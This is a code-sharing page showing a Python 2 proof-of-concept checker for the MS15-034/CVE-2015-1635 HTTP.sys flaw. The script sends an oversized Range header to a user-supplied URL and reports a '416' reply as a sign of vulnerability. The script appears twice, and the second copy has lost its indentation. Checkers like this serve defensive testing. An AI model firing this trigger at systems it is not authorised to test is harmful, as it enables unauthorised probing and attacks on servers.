maxrp · August 29, 2015 14:19
diff --git a/MS15-034.py b/MS15-034.py
 #!/usr/bin/env python                                                           
                                                                                
 __author__ = "Max R.D. Parmer <[email protected]>"                               
                                                                                
 """                                                                             
 A moderately more consistent implementation of MS15-034/CVE-2015-1635 PoC          
 which is a bit more tolerant of redirects and SSL.                              
                                                                                
 For best results, direct at a static file i.e. https://example.com/favico.ico   
 """                                                                             
                                                                                
                                                                                
 import sys                                                                      
 import urllib3                                                                  
                                                                                
 from urllib3 import PoolManager, disable_warnings                               
                                                                                
 # We really don't care if SSL is bogus.                                         
 disable_warnings()                                                              
                                                                                
 def main(url):                                                                  
    print "[+] Checking {} for MS15-034/CVE-2015-1635...".format(url)           
    poolargs = {                                                                
        'retries': None,                                                        
        'block': True,                                                          
        'headers': {'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64; \       
                                    rv:37.0) Gecko/20100101 Firefox/37.0'}         
    }                                                                           
    range_header = {'Range':'bytes=18-18446744073709551615'}                    
                                                                                
    with PoolManager(**poolargs) as http:                                       
        try:                                                                    
            request = http.urlopen('GET', url, headers=range_header)            
        except urllib3.exceptions.MaxRetryError, err:                           
            print "[!!] {}".format(err.reason)                                  
            sys.exit(127)                                                       
                                                                                
        if "416" in request.data:                                               
            server = request.getheader('Server')                                
            print "[+]\t{} running {} responded 416!\n".format(url, server)        
            sys.exit(0)                                                         
        else:                                                                   
            sys.exit(127)                                                       
                                                                                
                                                                                
 if __name__ == '__main__':                                                      
    if not len(sys.argv) > 1:                                                   
        print "Usage:\n\t{0} http://example.com".format(sys.argv[0])            
    else:                                                                       
        main(sys.argv[1])
	#!/usr/bin/env python

	__author__ = "Max R.D. Parmer <[email protected]>"

	"""
	A moderately more consistent implementation of MS15-034/CVE-2015-1635 PoC
	which is a bit more tolerant of redirects and SSL.

	For best results, direct at a static file i.e. https://example.com/favico.ico
	"""


	import sys
	import urllib3

	from urllib3 import PoolManager, disable_warnings

	# We really don't care if SSL is bogus.
	disable_warnings()

	def main(url):
	print "[+] Checking {} for MS15-034/CVE-2015-1635...".format(url)
	poolargs = {
	'retries': None,
	'block': True,
	'headers': {'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64; \
	rv:37.0) Gecko/20100101 Firefox/37.0'}
	}
	range_header = {'Range':'bytes=18-18446744073709551615'}

	with PoolManager(**poolargs) as http:
	try:
	request = http.urlopen('GET', url, headers=range_header)
	except urllib3.exceptions.MaxRetryError, err:
	print "[!!] {}".format(err.reason)
	sys.exit(127)

	if "416" in request.data:
	server = request.getheader('Server')
	print "[+]\t{} running {} responded 416!\n".format(url, server)
	sys.exit(0)
	else:
	sys.exit(127)


	if __name__ == '__main__':
	if not len(sys.argv) > 1:
	print "Usage:\n\t{0} http://example.com".format(sys.argv[0])
	else:
	main(sys.argv[1])